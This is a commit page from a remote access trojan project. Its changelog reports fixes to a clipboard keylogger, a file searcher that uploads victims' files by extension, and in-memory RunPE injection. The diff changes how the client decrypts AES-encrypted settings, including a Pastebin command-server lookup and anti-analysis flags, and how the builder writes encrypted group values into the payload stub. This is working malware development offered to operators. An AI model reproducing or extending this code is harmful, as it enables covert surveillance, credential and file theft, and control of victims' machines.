fixed send to disk
fixed keylogger [clipboard] #172
fixed installation
added file searcher [to search and upload any file by it extension]
added group to listview
updated plugin save method
updated runpe send to memory
minor improvements

## NOTE
You need to create a new stub from this version, and then use your old version to update all your clients, otherwise, you won't be able to use the new plugins
This commit is contained in:
NYAN CAT 2020-04-22 05:24:30 +03:00
parent 7af20a25ba
commit dfa505e2af
2 changed files with 3 additions and 2 deletions

View File

@ -46,7 +46,7 @@ namespace Client
public static Aes256 aes256; public static Aes256 aes256;
public static string Pastebin = "%Pastebin%"; public static string Pastebin = "%Pastebin%";
public static string BDOS = "%BDOS%"; public static string BDOS = "%BDOS%";
public static string Hwid = ""; public static string Hwid = null;
public static string Delay = "%Delay%"; public static string Delay = "%Delay%";
public static string Group = "%Group%"; public static string Group = "%Group%";
#endif #endif
@ -69,6 +69,7 @@ namespace Client
Pastebin = aes256.Decrypt(Pastebin); Pastebin = aes256.Decrypt(Pastebin);
Anti = aes256.Decrypt(Anti); Anti = aes256.Decrypt(Anti);
BDOS = aes256.Decrypt(BDOS); BDOS = aes256.Decrypt(BDOS);
Group = aes256.Decrypt(Group);
Hwid = HwidGen.HWID(); Hwid = HwidGen.HWID();
Serversignature = aes256.Decrypt(Serversignature); Serversignature = aes256.Decrypt(Serversignature);
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate))); ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));

View File

@ -450,7 +450,7 @@ namespace Server.Forms
method.Body.Instructions[i].Operand = numDelay.Value.ToString(); method.Body.Instructions[i].Operand = numDelay.Value.ToString();
if (method.Body.Instructions[i].Operand.ToString() == "%Group%") if (method.Body.Instructions[i].Operand.ToString() == "%Group%")
method.Body.Instructions[i].Operand = txtGroup.Text; method.Body.Instructions[i].Operand = aes.Encrypt(txtGroup.Text);
} }
} }
} }